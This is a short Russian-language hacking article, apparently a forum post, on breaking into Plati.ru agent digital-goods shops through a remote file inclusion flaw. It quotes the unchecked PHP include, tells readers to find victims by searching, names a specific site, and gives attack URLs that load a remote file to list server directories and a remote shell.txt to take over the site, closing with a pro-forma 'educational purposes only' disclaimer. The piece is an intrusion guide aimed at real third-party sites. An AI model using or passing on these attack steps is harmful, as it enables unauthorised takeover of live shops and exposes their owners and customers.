Уязвимости в агентских магазнах Plati.ru
Взлом агентского магазина цифровых товаров от Plati.ru.
Для начала ищем этот магазин идем на http://www.ya.ru и набираем агентский магазин
Выдаст кучу сайтов которые так и желают открыть для вас двери о которых я вам сейчас расскажу.
Большинство этих магазинов в корне сайта имеют вид:
[?
$page="index_.php";
include("html.php");
?]
Это меня сразу заинтересовало, т.к. можно передать скрипту html.php свою переменную $page..
Далее смотрим скрипт html.php:
Там без всяких проверок переменной $page идел следующий код:
[?
include($page);
?]
Не трудно догадаться, что здесь есть уязвимость на инклуд.
Далее делаем просто:
Дерем магазин например:
http://sherys.ru/html.php?page=http://w … .com/1.txt
Теперь мы видим список файлов в директории, и можем немного полазить по серверу.
Чтобы залить шелл пользуемся вот этой ссылкой:
http://sherys.ru/html.php?page=http://w … /shell.txt
Вот и все сайт под нашим контролем
Эта статья предназначена только для ознакомительных целей. Ни в коем случае не реализовывайте на практике то, что Вы прочитаете, так как Вы несете полную ответственность за свои поступки в соответствии с действующим законодательством. Я не отвечаю за достоверность информации и не несу ответственности за Ваши поступки! Все что вы делаете, вы делаете на свой страх и риск!!!